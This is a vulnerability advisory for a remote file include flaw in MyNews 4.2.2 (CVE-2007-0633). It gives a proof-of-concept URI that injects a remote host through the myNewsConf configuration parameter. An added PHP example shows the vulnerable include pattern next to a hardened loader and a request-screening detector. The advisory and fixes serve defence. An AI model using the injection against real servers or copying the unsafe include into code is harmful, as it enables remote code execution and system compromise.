MyNews Themefunc.PHP Remote File Include Vulnerability
BID: 22313
Info
| Bugtraq ID: | 22313 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-0633 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | GolD_M is credited with the discovery of this vulnerability. |
| Vulnerable: | T-Systems Solutions for Research GmbH MyNews 4.2.2 |
| Not Vulnerable: | |
Discussion
MyNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
This issue affects MyNews 4.2.2 and prior versions.
Exploit / POC
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/include/themes/themefunc.php?myNewsConf[path][sys][index]=http://www.example2.com
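The advisory describes the flaw (a configuration array element used as an include base without validation) and the PoC URI shows the parameter shape, `myNewsConf[path][sys][index]`, but MyNews's own source is not on the page. The following is an added example, written for this page and not MyNews code, that reconstructs the vulnerable pattern from the description and sets a hardened loader beside it, plus a request screen a defender can use to reject or log attempts to inject the configuration array. The install root, theme directory layout, theme names and the `theme` query parameter are assumptions; only the `myNewsConf[path][sys][index]` key path is taken from the advisory.

```php
<?php
// Added example (not MyNews code). Reconstructs the include pattern the advisory
// describes and shows the hardened form. Directory layout and theme names are assumed.
declare(strict_types=1);

// --- Vulnerable pattern, as described in the advisory (illustration only) ---
// If $myNewsConf is populated from the request (register_globals or manual extraction),
// the include base is attacker-controlled; with allow_url_include enabled it can even
// point at a remote host.
function loadThemeUnsafe(array $myNewsConf): void
{
    $base = $myNewsConf['path']['sys']['index'];    // request-controlled value
    include $base . '/include/themes/default.php';  // remote or local file include
}

// --- Hardened pattern ---
// 1. The base path is a server-side constant and never read from the request.
// 2. The only request-influenced value (the theme name) is checked against an allow-list.
// 3. The resolved path is confirmed to stay inside the theme directory.
const MYNEWS_ROOT = __DIR__;                              // assumption: install root
const MYNEWS_THEME_DIR = MYNEWS_ROOT . '/include/themes'; // from the PoC URI path
const MYNEWS_ALLOWED_THEMES = ['default', 'classic'];     // assumption: shipped themes

function resolveThemeFile(string $theme): ?string
{
    if (!in_array($theme, MYNEWS_ALLOWED_THEMES, true)) {
        return null; // unknown theme: refuse rather than guess
    }
    $candidate = realpath(MYNEWS_THEME_DIR . '/' . $theme . '.php');
    $root = realpath(MYNEWS_THEME_DIR);
    if ($candidate === false || $root === false) {
        return null; // file or directory does not exist
    }
    // realpath() has collapsed ../ and symlinks; now require the prefix to match.
    if (strncmp($candidate, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

function loadThemeSafe(string $requestedTheme): bool
{
    $file = resolveThemeFile($requestedTheme);
    if ($file === null) {
        error_log('MyNews: rejected theme request: ' . $requestedTheme);
        return false;
    }
    include $file;
    return true;
}

// --- Request screen for the pattern in the PoC URI ---
// The application's configuration array must never arrive via the request, and no
// include-related parameter should carry a URL scheme. Returns a reason string for
// logging, or null when the request looks clean.
function configOverrideAttempt(array $query): ?string
{
    if (array_key_exists('myNewsConf', $query)) {
        return 'myNewsConf supplied in request';
    }
    foreach ($query as $name => $value) {
        if (is_string($value) && preg_match('#^\s*[a-z][a-z0-9+.-]*://#i', $value)) {
            return "URL scheme in parameter $name";
        }
    }
    return null;
}

// Hosting-side settings that blunt this bug class even before the code is fixed:
//   php.ini:  allow_url_include = Off   (default since PHP 5.2)
//             allow_url_fopen   = Off   (if the application does not need it)
//             register_globals  = Off   (removed entirely in PHP 5.4)

if (($reason = configOverrideAttempt($_GET)) !== null) {
    error_log('MyNews: blocked request: ' . $reason);
    http_response_code(400);
    exit;
}
$theme = (isset($_GET['theme']) && is_string($_GET['theme'])) ? $_GET['theme'] : 'default';
loadThemeSafe($theme);
```

The `error_log` calls give a detection hook: a request carrying `myNewsConf[...]` or a `://` value in an include-related parameter is a high-confidence indicator of probing for this issue and can be alerted on from the PHP error log or the web server access log.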
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].